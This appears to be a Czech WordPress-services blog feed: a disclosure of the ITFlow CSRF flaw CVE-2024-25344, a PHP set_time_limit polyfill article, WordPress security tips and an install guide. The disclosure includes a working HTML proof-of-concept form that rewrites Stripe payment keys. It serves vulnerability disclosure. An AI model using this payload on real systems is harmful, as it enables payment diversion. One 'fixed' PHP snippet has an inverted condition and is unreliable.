Ačkoliv naší pomoc zaměřujeme na systém WordPress, nejvíce se naše společnost zabývá vývojem zakázkového software a jeho provozu. V průběhu posledního čtvrtletí roku 2023 jsme pro naše klienty nasazovali open-source systém pro ticketing a správu klientů ITFlow.

Při nasazování a nastavování, jsme kvůli několika nedokonalostem v dokumentaci zamířili pro informace přímo do zdrojového kódu. V něm jsme identifikovali potenciální problém, kdy pro klíčové změny systému nedocházelo k využívání CSRF tokenů.

Zranitelnost typu Cross Site Request Forgery (CSRF) se vyznačuje tím, že dochází ke zneužití aktuálního přihlášení uživatele v nějaké aplikaci, kdy bez jeho vědomí, v rámci jeho přihlášení, dochází k odesílání požadavků do zranitelné aplikace. Často tak dochází např. k nevyžádané změně hesla účtu atd.

Pro otestování naší hypotézy jsme sestavili PoC (Proof of concept) a vyzkoušeli na lokální verzi, zda se zranitelnost skutečně v testovaném software nachází.

CVE-2024-25344

Software ITFlow měl zranitelnou sekci pro nastavení systému, konkrétně endpoint post.php, který využívá pro zpracovávání formulářů. Zde absentovala kontrola vygenerovaných CSRF tokenů, které jsou běžnou obranou před zranitelností CSRF.

Po exploitování této zranitelnosti se nám podařilo změnit nastavení platební brány Stripe, kterou určitě velká většina WordPressáků zná, případně se nám podařilo upravit nastavení Microsoft Azure SSO. Výsledkem je pro útočníka možnost nastavit systém tak, aby veškeré platby skrze systém ITFlow a bránu Stripe obdržel on.

PoC

Protože již byla zranitelnost v kooperaci s vývojáři opravena, zveřejňujeme tuto zprávu a náš PoC, pro zranitelné verze systému. Zranitelné jsou všechny instance ITFlow před commitem 432488eca3998c5be6b6b9e8f8ba01f54bc12378.

<html>
<form enctype="multipart/form-data" method="POST" action="https://itflow.example.com/post.php">
    <table>
        <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr>
        <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr>
        <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr>
        <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr>
        <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr>
    </table>
    <input type="submit" value="https://itflow.example.com/post.php">
</form>
</html>

• Systém ITFlow – itflow.org
• NIST CVE-2024-25344
• MITRE CVE-2024-25344
• PacketStormSecurity CVE-2024-25344
• https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378
• https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46

Článek ITFlow CSRF zranitelnost CVE-2024-25344 se nejdříve objevil na WP Pomoc.

V nastavení PHP existuje možnost zakázat volání nějaké funkce z bezpečnostních, nebo i jiných důvodů s pomocí direktivy disable_functions. Po tomto nastavení často šahají sdílené webhostingy, protože například v případě funkce set_time_limit by mohlo dojít k většímu vytěžování zdrojů serveru na úkor ostatních webů na daném webhostingu.

Pokud jsme v případě PHP 7 a starších verzí zavolali zakázanou funkci, dostali jsme warning s následující hláškou.

Warning: set_time_limit() has been disabled for security reasons in ... on line ...

Protože se jedná pouze o warning, bylo možné tuto hlášku potlačit pomocí zavináče (@) a pokračovat dál, jako by se nic nestalo. Lze proto ve starších verzích WordPressu, Joomly a různých pluginů narazit na následující volání.

@set_time_limit(0);

Tento (značně lenivý) přístup pak změnil příchod PHP 8, kdy byl tento vcelku neškodný warning povýšen na error a začaly se dít věci. Tato funkce je totiž často užívána v případech, kdy dochází k nějakému AJAXovému volání. Uživatel často ani nepozná problém. Jedinou indicií je většinou pouze načítací obrazovka, která nikdy nezmizí.

Fatal error: Uncaught Error: Call to undefined function set_time_limit() in ...:...

Pro populární systémy přišlo řešení vcelku rychle. Můžeme se totiž dotázat, jestli funkce existuje a až poté ji v případě splnění podmínky zavolat. Jednoduché že? Problém je v tom, že ačkoliv jádra těchto systémů aktualizaci s následujícím kódem obdržela, valná většina pluginů a komunitního kódu již ne.

if (!function_exists('set_time_limit')) {
    set_time_limit(0);
}

Najednou se tedy dostáváme do stavu, kdy část systémů funguje s pomocí výše popsaného opraveného kódu a část padá, protože obsahuje již zastaralý workaround. Jako řešení se tedy nabízí polyfill této metody a to nám i nová verze PHP 8 dovoluje! V minulých verzích to možné nebylo, protože na zakázanou funkci nebylo nahlíženo stejně jako na neexistující. Sama dokumentace PHP zmiňuje tuto změnu následovně: „Disabled functions are now treated exactly like non-existent functions. Calling a disabled function will report it as unknown, and redefining a disabled function is now possible.“.

// Jednoduchý polyfill pro PHP 8
if (!function_exists('set_time_limit')) {
    function set_time_limit($sec) {
        return false; // Vracíme informaci o tom, že volání selhalo.
    }
}

A fungovat nám to najednou bude krásně! Ale jen pro PHP 8. Pokud tento kód zkusíme spustit ve starších verzích PHP, selže. Příčinou je právě výskyt zakázané funkce v seznamu definovaných funkcí a výsledkem je tak chyba s informací, že nemůžeme funkci deklarovat vícekrát.

Fatal error: Cannot redeclare set_time_limit() in ... on line ...

Protože nám function_exists pro vypnutou funkci napříč verzemi PHP vrátí false, musíme nějak toto volání omezit na PHP verze 8. S pomocí PHP_VERSION a version_compare() je to vcelku triviální. Výsledný kód, který bude problém řešit napříč verzemi by mohl vypadat následovně:

if (!function_exists('set_time_limit') && version_compare(PHP_VERSION, '8.0.0', '>=')) {
    function set_time_limit($sec) {
        return false; // Vracíme informaci o tom, že volání selhalo.
    }
}

V případě WordPressu pak můžeme tuto funkci vložit např. do souboru wp-config.php a tím vyřešit problém s voláním zakázené funkce, který by nám mohl shazovat nejčastěji cron a AJAX volání.

Potřebujete pomoc?

Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš kontaktní formulář nebo se nám ozvat na info@wp-pomoc.cz.

Článek PHP funkce set_time_limit a její problémy u hostingů se nejdříve objevil na WP Pomoc.

Pokud uchováváte osobní údaje, mohlo dojít k jejich úniku. Analyzujte proto prosím svůj web jestli k němu opravdu nedošlo. Mohla vám tak vzniknout ohlašovací povinnost vůči regulátorovi.

Pro naše klienty jsme problém okamžitě vyřešili a jejich weby aktualizovali na nejnovější verze. Pokud chcete i vy takový servis, neváhejte nás kontaktovat zde, nebo nám napište na info@wp-pomoc.cz.

Článek WP Fastest Cache kritická zranitelnost se nejdříve objevil na WP Pomoc.

1. Aktualizace

Pravidelné aktualizace jsou zásadní pro udržení bezpečnosti vašeho WordPress webu. Nezapomeňte pravidelně kontrolovat dostupné aktualizace a zajistěte, aby byl váš systém, šablony a pluginy vždy aktualizovány na nejnovější verzi.

2. Silné heslo

Jednoduchá hesla jsou snadným cílem pro útočníky. Zvolte silné heslo obsahující kombinaci velkých a malých písmen, číslic a speciálních znaků. Důležité je používat unikátní heslo pro každý účet na webu.

3. Ochrana před útoky hrubou silou

Zabezpečte svůj WordPress web proti útokům hrubou silou omezením počtu neúspěšných pokusů o přihlášení. Můžete použít pluginy, které omezí počet pokusů a dočasně blokují IP adresy s podezřelou aktivitou.

4. Volba hostingu

Volba spolehlivého a bezpečného hostingového poskytovatele je klíčová. Zajistěte si, že váš hostingový poskytovatel poskytuje bezpečnostní opatření, jako je například aktualizace softwaru, zabezpečení proti útokům DDoS a zálohování dat.

5. Dvoufaktorová autentizace (2FA)

Aktivujte dvoufaktorovou autentizaci pro přihlášení na váš WordPress web. Toto rozšíření zpřísňuje zabezpečení tím, že vyžaduje kromě hesla také druhý ověřovací faktor, jako je například SMS kód nebo ověřovací aplikace.

6. Zálohování dat

Pravidelně zálohujte svá data, včetně obsahu webu, databáze a souborů. V případě útoku nebo jiného incidentu budete mít možnost obnovit svůj web z poslední dostupné zálohy.

7. Bezpečnostní pluginy

Existuje mnoho bezpečnostních pluginů, které mohou posílit ochranu vašeho WordPress webu. Nainstalujte a aktivujte pluginy, které nabízejí funkcionalitu jako detekce a blokování podezřelých aktivit, firewall, kontrola škodlivých kódů a další.

8. Skryjte verzi WordPress

Neprezentujte veřejně verzi WordPressu, kterou používáte na svém webu. Útočníci mohou využít informace o verzi pro cílení na známé zranitelnosti. Použijte plugin nebo upravte soubor .htaccess, čímž skryjete informace o verzi. Nezapomeňte na README soubory, ve kterých je verze taktéž obsažena.

9. XML-RPC

WordPress používá XML-RPC pro komunikaci s webovými službami a umožňuje vzdálené publikování příspěvků, aktualizaci obsahu a provádění dalších operací prostřednictvím API. Jedním z hlavních bezpečnostních problémů XML-RPC je zvýšené riziko útoků hrubou silou a jejich intenzity. Zároveň lze skrze XML-RPC odhalit citlivé informace. Zakažte XML-RPC na vašem webu.

10. Monitorování bezpečnosti

Pravidelně monitorujte svůj WordPress web pomocí nástrojů pro detekci bezpečnostních hrozeb. Tyto nástroje vám mohou poskytnout upozornění na podezřelou aktivitu, například neautorizované změny nebo pokusy o prolomení zabezpečení.

Potřebujete pomoc?

Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš kontaktní formulář nebo se nám ozvat na info@wp-pomoc.cz.

Článek 10 tipů pro bezpečný WordPress web se nejdříve objevil na WP Pomoc.

Vyberte si hostingovou službu

Pro zprovoznění a následný provoz WordPressu na vaší webové stránce budete potřebovat hostingovou službu, která vám poskytne místo pro umístění vašich souborů a databáze. Existuje mnoho hostingových společností, které nabízejí služby specificky pro WordPress. V čechách je nejběžnější například Wedos, Web Support a další. Zaregistrujte se u nich, vyberte si službu a zaplaťte za hosting.

Vyberte si doménu

Doména je adresa vašeho webu na internetu (například wp-pomoc.cz). Většina hostingových společností vám také nabízí možnost zakoupit doménu přímo u nich. Zvolte si vhodnou doménu, která je jednoduchá, snadno zapamatovatelná a co nejvíce odpovídá obsahu vašeho webu.

Instalace WordPressu

Automatická instalace

Většina moderních hostingových služeb má jednoduchý a automatizovaný proces instalace WordPressu. Po přihlášení do svého účtu na hostingové platformě se obvykle dostanete na ovládací panel. Zde byste měli najít sekci nebo nástroj pro instalaci WordPressu. Zvolte tuto možnost a postupujte podle pokynů na obrazovce. Obvykle budete muset zadat název domény, vytvořit uživatelské jméno a heslo pro administrátorský účet WordPressu a potvrdit instalaci.

Manuální instalace

Prvním krokem je stáhnout nejnovější verzi WordPressu ze oficiálního webu WordPress.org. Na domovské stránce najdete možnost „Stáhnout WordPress“. Klikněte na tuto možnost a uložte soubor ZIP na svůj počítač.

Po stažení WordPressu extrahujte obsah souboru ZIP do složky na vašem počítači. Získáte tak adresář s názvem „wordpress“, který obsahuje všechny potřebné soubory pro WordPress

Před instalací WordPressu budete potřebovat prázdnou MySQL databázi. Přihlaste se do svého hostingového účtu a přejděte do sekce databází. Vytvořte novou databázi a zaznamenejte si název databáze, uživatelské jméno a heslo.

Pro přenos souborů na váš hostingový účet budete potřebovat FTP klienta. Existuje mnoho zdarma dostupných FTP klientů, jako například FileZilla. Stáhněte si FTP klienta a připojte se k vašemu hostingovému účtu pomocí poskytnutých přihlašovacích údajů (hostingová adresa, uživatelské jméno, heslo).

Ve vašem FTP klientovi najděte složku na vašem serveru, kam chcete nahrát soubory WordPressu. Obvykle se jedná o složku s názvem „public_html“ nebo „www“. Přetáhněte všechny soubory a složky z adresáře „wordpress“ (který jste extrahovali ve druhém kroku) do příslušné složky na serveru.

Ve složce na serveru najděte soubor s názvem „wp-config-sample.php“ a přejmenujte ho na „wp-config.php“. Otevřete tento soubor v textovém editoru a upravte následující řádky:

define('DB_NAME', 'nazev_vase_databaze');
define('DB_USER', 'vase_databazove_jmeno');
define('DB_PASSWORD', 'vase_databazove_heslo');
define('DB_HOST', 'adresa_databazoveho_serveru');

Zde nahraďte „nazev_vase_databaze“ názvem vaší vytvořené MySQL databáze, „vase_databazove_jmeno“ uživatelským jménem pro přístup k databázi a „vase_databazove_heslo“ příslušným heslem. V případě, že je databázový server na stejném stroji jako webový server, lze použít jako jeho adresu „localhost“ případně 127.0.0.1.

Poté, co jste provedli všechny předchozí kroky, můžete spustit instalační proces WordPressu pomocí webového prohlížeče. Přejděte na adresu vašeho webu (například wp-pomoc.cz) a měli byste být přesměrováni na stránku pro instalaci WordPressu. Postupujte podle pokynů na obrazovce a vyplňte požadované informace, včetně názvu webu, uživatelského jména a hesla pro administrátorský účet WordPressu.

Po dokončení instalačního procesu budete mít plně funkční WordPress webovou stránku. Můžete se přihlásit do administračního rozhraní pomocí zvoleného uživatelského jména a hesla a začít přizpůsobovat vzhled a funkcionalitu WordPressu pomocí široké škály dostupných motivů (themes) a rozšíření (plugins).

Potřebujete pomoc?

Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš kontaktní formulář nebo se nám ozvat na info@wp-pomoc.cz.

Článek Jak začít s WordPressem – Průvodce pro začátečníky se nejdříve objevil na WP Pomoc.